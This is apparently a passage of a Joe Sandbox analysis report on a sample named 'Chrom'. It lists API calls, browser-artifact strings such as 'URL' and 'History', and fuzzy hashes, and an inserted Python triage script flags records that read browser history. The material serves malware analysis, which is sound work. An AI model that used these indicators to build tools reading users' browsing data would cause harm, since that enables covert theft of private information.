• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
• Opcode ID: 42e4004be367d569ef6b1ed2fd7568d25a8fc534219fc729a21696d2538a26ff
• Instruction ID: f6ca766a756f956276b7987b22366021d45869a5efd1f957245e1e0f0cc444aa
• Opcode Fuzzy Hash: 42e4004be367d569ef6b1ed2fd7568d25a8fc534219fc729a21696d2538a26ff
• Instruction Fuzzy Hash: 2BF04F36500209FBCF116FA4EC0AADE3B65FF85721F10413AF915A41F2CB79A9A49A49
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040AD93
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040ADA3
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040ADB2
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
• Opcode ID: 500b3f37a8e27eabcf8092cb1f440f01365611260bcda39269a24c65035c9a43
• Instruction ID: 31e7aa1bea13d32e7bca6e77574f5e504946d2401e2512c444bffb4365324c75
• Opcode Fuzzy Hash: 500b3f37a8e27eabcf8092cb1f440f01365611260bcda39269a24c65035c9a43
• Instruction Fuzzy Hash: A0F0FE769112099BEB119BA0DD49BBBB3FCBB4570BF044439E552E1080EB74D4098B65
APIs
• memcpy.MSVCRT(0045B808,?,00000050,?,00401C6E,?), ref: 00413A08
• memcpy.MSVCRT(0045B538,?,000002CC,0045B808,?,00000050,?,00401C6E,?), ref: 00413A1A
• GetModuleHandleW.KERNEL32(00000000), ref: 00413A2D
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_00013704,00000000), ref: 00413A41
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
• Opcode ID: 4d87169f9d56b17e00e3402c301ad3cb042f0108c164b9bdc7b5e575712afbe5
• Instruction ID: bbec9d8a740cb9b84f1fef4082fdc1a95378a550d55470654ec0ec15965ea30e
• Opcode Fuzzy Hash: 4d87169f9d56b17e00e3402c301ad3cb042f0108c164b9bdc7b5e575712afbe5
• Instruction Fuzzy Hash: 85F027B2640320ABE310BFB5BC06F463AA4F709B1BF114836F600A51D2C3B949558FDD
APIs
• ??3@YAXPAX@Z.MSVCRT(00840048), ref: 0044E1B1
• ??3@YAXPAX@Z.MSVCRT(00850050), ref: 0044E1C1
• ??3@YAXPAX@Z.MSVCRT(00986D88), ref: 0044E1D1
• ??3@YAXPAX@Z.MSVCRT(00850458), ref: 0044E1E1
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ff29cf86c77b574f117a7c2e416dd39f00a755436dc2afce52489674462316f8
• Instruction ID: 0040574f82d095680108ff298768a764fab42f46883a413dd34ad4582741df14
• Opcode Fuzzy Hash: ff29cf86c77b574f117a7c2e416dd39f00a755436dc2afce52489674462316f8
• Instruction Fuzzy Hash: 46E0197130120006BE2CEB3FA981A2223CC2E61301319883AF900C2282CF28E980802E
APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 004118BE
• InvalidateRect.USER32(?,00000000,00000000), ref: 0041190E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: InvalidateMessageRectSend
• String ID: xr@
• API String ID: 909852535-3463887390
• Opcode ID: ba6026d9526b87ee37bd19c55eabe9f4096063d0fb6082bcfa7714a2564ce611
• Instruction ID: 0293175210dcad0e75e5e34cf014ada8c26fc98d1d87670dbb71c7f4721f3b00
• Opcode Fuzzy Hash: ba6026d9526b87ee37bd19c55eabe9f4096063d0fb6082bcfa7714a2564ce611
• Instruction Fuzzy Hash: B761F6307002045BCF20EB658885EEE73E6AF44768F52446BF2595B2B2CB79ADC5CB4D
APIs
• wcschr.MSVCRT ref: 0040F2D7
• wcschr.MSVCRT ref: 0040F2E5
  • Part of subcall function 0040B0B2: wcslen.MSVCRT ref: 0040B0CE
  • Part of subcall function 0040B0B2: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F32D), ref: 0040B0F1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
• Opcode ID: 03968bedbba8fd43ed3f28f545e1ed9fa43ac2e70cc11921a3825c77fa5f6545
                                                                                                                                                        • Instruction ID: 10195603321605bd56750b7816c0d0271b844f9ce746ccc2960791535488f280
                                                                                                                                                        • Opcode Fuzzy Hash: 03968bedbba8fd43ed3f28f545e1ed9fa43ac2e70cc11921a3825c77fa5f6545
                                                                                                                                                        • Instruction Fuzzy Hash: DA318371904204EBDF24EFA5C8419EEB7B4EF54324B21417BEC10B76D1DB78A94ACB98
APIs
• wcschr.MSVCRT ref: 0040AB07
• memcpy.MSVCRT(00000000,00983514,00000000,?,?,00983514,?,?,004041EF,00000000,00000000,0044F6A0,?,?,?), ref: 0040AB53
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: same five dumps as listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpywcschr
• String ID: A@
• API String ID: 2424118378-2073013064
• Opcode ID: 65d1c98ee92e68f8316e26253cac294d40828dc9945de756115462d34a8b6e5e
• Instruction ID: 830330097a83edb220799b64d51470a873f960a000b5f267707f01fc502e4dd1
• Opcode Fuzzy Hash: 65d1c98ee92e68f8316e26253cac294d40828dc9945de756115462d34a8b6e5e
• Instruction Fuzzy Hash: B121CC32910315ABDB259F18C4809BAB3B9EB50354B50453BEE42E73D1E7B8BC61C6DA
APIs
  • Part of subcall function 0040A8EC: SetFilePointer.KERNEL32(0040C76D,?,00000000,00000000,?,0040C573,00000000,00000000,?,00000020,?,0040C703,?,?,*.*,0040C76D), ref: 0040A8F9
• _memicmp.MSVCRT ref: 0040C4BB
• memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C76D,00000000), ref: 0040C4D2
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: same five dumps as listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: FilePointer_memicmpmemcpy
• String ID: URL
• API String ID: 2108176848-3574463123
• Opcode ID: 8b46189477faf47e70554d53ccdcd0d71d59fab45cca677982259d8f08aed264
• Instruction ID: e1781fd545be80fe7556f1c298766c282a9e191fb349476702c3e518ab4974fa
• Opcode Fuzzy Hash: 8b46189477faf47e70554d53ccdcd0d71d59fab45cca677982259d8f08aed264
• Instruction Fuzzy Hash: 8411E335500204FBEB11EF25CC45F5B7BE8EF42348F004066F904AB292E779EA11D7A9
APIs
• _snwprintf.MSVCRT ref: 0040A957
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A967
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: same five dumps as listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
• Opcode ID: b028d3dd81a9ff72aad3c771905fcdc4d2240dadb792d078678063d252d14bc1
• Instruction ID: 6a588dd7550e73766d5457c33bdc9f1bb05d6c65df0ab8095161fbe55ab5aab1
• Opcode Fuzzy Hash: b028d3dd81a9ff72aad3c771905fcdc4d2240dadb792d078678063d252d14bc1
• Instruction Fuzzy Hash: A2118272A00308BFEB11DFE8C8829AFB3B4FB45714F118476ED14E7141D6389A158B96
APIs
• UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,00419D38,?,00000000), ref: 00419B54
• CloseHandle.KERNEL32(?), ref: 00419B60
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: same five dumps as listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: CloseFileHandleUnmapView
• String ID: ItA
• API String ID: 2381555830-3397558953
• Opcode ID: 78d9621554c737ac66a3f4cb29ee58c3d3362d23627f1abe4208ba6ebade4b46
• Instruction ID: 8fc27f8f603743712d85b87c8facf7af589576e01e28d81e59fb0ee190f4bb1a
• Opcode Fuzzy Hash: 78d9621554c737ac66a3f4cb29ee58c3d3362d23627f1abe4208ba6ebade4b46
• Instruction Fuzzy Hash: B3119A32409710DFCB21AF15E984A96B7E4FF40B22B00082EE592976A1C738FC85CB98
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: same five dumps as listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _snwprintf
• String ID: %%-%d.%ds
• API String ID: 3988819677-2008345750
• Opcode ID: e1797fb05a737fba52aba767bb24c373e33194b62cf47ebf28a73d56ffb6a049
• Instruction ID: 95e02a5c15eeed1d551906e02850d48b35c8b7aee7daa8271261a5313117e4a6
• Opcode Fuzzy Hash: e1797fb05a737fba52aba767bb24c373e33194b62cf47ebf28a73d56ffb6a049
• Instruction Fuzzy Hash: 4601B575600204AFD720AF19CC82D9BB7ADFB4C718B00443EFD46A7692C639F855CB64
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: same five dumps as listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _memicmpwcslen
• String ID: History
• API String ID: 1872909662-3892791767
• Opcode ID: d43cc8d850bd4f9d15064c446135e088d8750b77bb674fd7b9a2667d4b21ddf2
• Instruction ID: 941d79324f8edf167e3c65633afc17faa179ac8f5e09340cfeb8a5c916fb1dc6
• Opcode Fuzzy Hash: d43cc8d850bd4f9d15064c446135e088d8750b77bb674fd7b9a2667d4b21ddf2
• Instruction Fuzzy Hash: EFF0A4725082018BD210EE298C41A2BF7E8DF813E9F11093FF8A1A62C2DB39DC4546ED
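Every function record in this part of the report follows one layout: an APIs list (with "Part of subcall function" entries for calls made by a callee), a Memory Dump Source, and a Similarity block carrying the API ID, String ID and fuzzy hashes. Reading hundreds of them by eye is slow, so the Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses records in this layout into structured objects and flags those that pair a case-insensitive compare with file I/O or that reference a browser-artifact string such as the URL and History String IDs seen in the records above. The sample input is two records copied from this section with the indentation removed; the artifact-string and file-I/O watch-lists are our own assumptions and should be extended for the target being analysed.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: two function records copied from this report section
# with the deep indentation removed. The field labels are the ones the report uses.
SAMPLE = """\
APIs
• wcschr.MSVCRT ref: 0040AB07
• memcpy.MSVCRT(00000000,00983514,00000000,?,?,00983514,?,?,004041EF,00000000,00000000,0044F6A0,?,?,?), ref: 0040AB53
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpywcschr
• String ID: A@
• API String ID: 2424118378-2073013064
• Opcode ID: 65d1c98ee92e68f8316e26253cac294d40828dc9945de756115462d34a8b6e5e
• Instruction Fuzzy Hash: B121CC32910315ABDB259F18C4809BAB3B9EB50354B50453BEE42E73D1E7B8BC61C6DA
APIs
  • Part of subcall function 0040A8EC: SetFilePointer.KERNEL32(0040C76D,?,00000000,00000000,?,0040C573,00000000,00000000,?,00000020,?,0040C703,?,?,*.*,0040C76D), ref: 0040A8F9
• _memicmp.MSVCRT ref: 0040C4BB
• memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C76D,00000000), ref: 0040C4D2
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FilePointer_memicmpmemcpy
• String ID: URL
• API String ID: 2108176848-3574463123
• Opcode ID: 8b46189477faf47e70554d53ccdcd0d71d59fab45cca677982259d8f08aed264
• Instruction Fuzzy Hash: 8411E335500204FBEB11EF25CC45F5B7BE8EF42348F004066F904AB292E779EA11D7A9
"""

# One API line: optional "Part of subcall function XXXXXXXX: " prefix, then
# name.MODULE, an optional "(args)" list, and the call-site address after "ref:".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Yara matches", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                           # call-site address inside the dump
    args: list
    via_subcall: Optional[str] = None  # callee address when the call is not direct


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "API ID", "String ID", hashes, ...

    @property
    def direct_api_names(self):
        """APIs called by this function itself, not by one of its callees."""
        return sorted({a.name for a in self.apis if a.via_subcall is None})


def parse_records(text):
    """Split report text into FunctionRecords; each record starts at an 'APIs' header."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or line in SECTION_HEADERS:
            continue
        line = line.lstrip("•").strip()
        m = API_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            current.apis.append(ApiCall(m.group("name"), m.group("module"),
                                        m.group("ref"), args, m.group("sub")))
            continue
        key, sep, val = line.partition(": ")   # "Key: value" bullets
        if sep:
            current.fields[key] = val
    return records


# Assumption: these watch-lists are ours. "URL" and "History" are the String IDs
# seen on this page; extend both sets for the artifacts the target actually reads.
ARTIFACT_STRINGS = {"URL", "History"}
FILE_IO_APIS = {"SetFilePointer", "ReadFile", "CreateFileW", "MapViewOfFile"}


def triage(record):
    """Reasons a record deserves a closer look; an empty list means none found."""
    reasons = []
    sid = record.fields.get("String ID", "")
    if sid in ARTIFACT_STRINGS:
        reasons.append(f"references artifact string {sid!r}")
    names = {a.name for a in record.apis}   # callee APIs count here too
    if "_memicmp" in names and names & FILE_IO_APIS:
        reasons.append("case-insensitive compare next to file I/O (content scanning)")
    return reasons


def summarize(records):
    """Compact per-function view: APIs, report IDs, fuzzy hash and triage reasons."""
    return [{"apis": r.direct_api_names,
             "api_id": r.fields.get("API ID"),
             "string_id": r.fields.get("String ID"),
             "instruction_fuzzy_hash": r.fields.get("Instruction Fuzzy Hash"),
             "reasons": triage(r)} for r in records]


if __name__ == "__main__":
    for entry in summarize(parse_records(SAMPLE)):
        print(entry)
```

Run it over the full report text (after stripping the indentation) to get one summary line per function; the Instruction Fuzzy Hash is kept in the output because it is the field worth comparing across samples when you want to spot the same routine in a later build.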
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: same five dumps as listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: FileNameSavewcscpy
• String ID: X
• API String ID: 3080202770-3081909835
• Opcode ID: cf50ce10e3d8adb72faeaa0eaa9c5517279bca70dc60290c33b6f594c57b49c2
                                                                                                                                                        • Instruction ID: 6611e8cc3d156157abd2d980a6588325782f281802a6564c3fcb0580a52e3f25
                                                                                                                                                        • Opcode Fuzzy Hash: cf50ce10e3d8adb72faeaa0eaa9c5517279bca70dc60290c33b6f594c57b49c2
                                                                                                                                                        • Instruction Fuzzy Hash: 3201D3B2E002499FDF15DFE9D88479EBBF4EF08319F10842AE815E6280DB789949CF55
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040E2AB
                                                                                                                                                        • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E2DA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSendmemset
                                                                                                                                                        • String ID: "
                                                                                                                                                        • API String ID: 568519121-123907689
                                                                                                                                                        • Opcode ID: aee607dd69faffa0a38dbaa75629dbd7c8e2f222f7178d7bf2009bde8f964298
                                                                                                                                                        • Instruction ID: e50019999580a74d85a60b07338c936db99593caccc9844b50c561b4a2aa9bba
                                                                                                                                                        • Opcode Fuzzy Hash: aee607dd69faffa0a38dbaa75629dbd7c8e2f222f7178d7bf2009bde8f964298
                                                                                                                                                        • Instruction Fuzzy Hash: 3301D179800205EFDB209F9AC841AAFB7F8FF88745F01843EE855A6281E3349855CF79
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowPlacement.USER32(?,?,?,?,?,004116D2,?,General,?,00000000,00000001), ref: 00402015
                                                                                                                                                        • memset.MSVCRT ref: 00402028
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PlacementWindowmemset
                                                                                                                                                        • String ID: WinPos
                                                                                                                                                        • API String ID: 4036792311-2823255486
                                                                                                                                                        • Opcode ID: 521b6bf8a0af6af857a236e47d383093fbaed3f27b246b805a3dea25d9df0909
                                                                                                                                                        • Instruction ID: 6104400570af448ab2160dad3ac02d8bcb917da1af1eef173e874a3fdbf9e1c7
                                                                                                                                                        • Opcode Fuzzy Hash: 521b6bf8a0af6af857a236e47d383093fbaed3f27b246b805a3dea25d9df0909
                                                                                                                                                        • Instruction Fuzzy Hash: 06F04F70600304AFEB14EF94C98DF5A33ACAF04700F14007AEA099B1C1D7F8A900CA29
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileNameOpenwcscpy
                                                                                                                                                        • String ID: X
                                                                                                                                                        • API String ID: 3246554996-3081909835
                                                                                                                                                        • Opcode ID: 2a67dbd5aac994321e133afa0018ae29574dd41fddbd4530bc2321b891ce1e3f
                                                                                                                                                        • Instruction ID: 539f78c5397e7073aed27145bddffd849fb5fc534cbcdb44ae1ffce86d8eed53
                                                                                                                                                        • Opcode Fuzzy Hash: 2a67dbd5aac994321e133afa0018ae29574dd41fddbd4530bc2321b891ce1e3f
                                                                                                                                                        • Instruction Fuzzy Hash: 6C0162B1D0124C9FDB51DFE9D8856CEBBF4BF09318F10802AE819F6240EB7495458F55
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040DF52
                                                                                                                                                        • LoadStringW.USER32(hE,00000000,?,00001000), ref: 0040DF6A
                                                                                                                                                          • Part of subcall function 0040DC1C: memset.MSVCRT ref: 0040DC2F
                                                                                                                                                          • Part of subcall function 0040DC1C: _itow.MSVCRT ref: 0040DC3D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$LoadString_itow
                                                                                                                                                        • String ID: hE
                                                                                                                                                        • API String ID: 2363904170-2023966264
                                                                                                                                                        • Opcode ID: a9946285b92afe35a5342dbba43cd3e7e620973a75260ca37de27efc1ebb9654
                                                                                                                                                        • Instruction ID: 9b56b68215c9794ac37e938ab49c8f41abb91b806af26c10162807848ed08486
                                                                                                                                                        • Opcode Fuzzy Hash: a9946285b92afe35a5342dbba43cd3e7e620973a75260ca37de27efc1ebb9654
                                                                                                                                                        • Instruction Fuzzy Hash: D8F08272D0022969F720A7459D4ABDFB79C9F05744F000076BB0CE1192D6649A44C7AE
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040DC2F
                                                                                                                                                        • _itow.MSVCRT ref: 0040DC3D
                                                                                                                                                          • Part of subcall function 0040DBA3: memset.MSVCRT ref: 0040DBC8
                                                                                                                                                          • Part of subcall function 0040DBA3: GetPrivateProfileStringW.KERNEL32(0045E668,?,0044F4CC,?,00001000,0045E458), ref: 0040DBF0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$PrivateProfileString_itow
                                                                                                                                                        • String ID: hE
                                                                                                                                                        • API String ID: 1482724422-2023966264
                                                                                                                                                        • Opcode ID: 9d91d721a2435454d66ee30fea597a374f678bd0bf4a4b4aeba8e389cc8d88fc
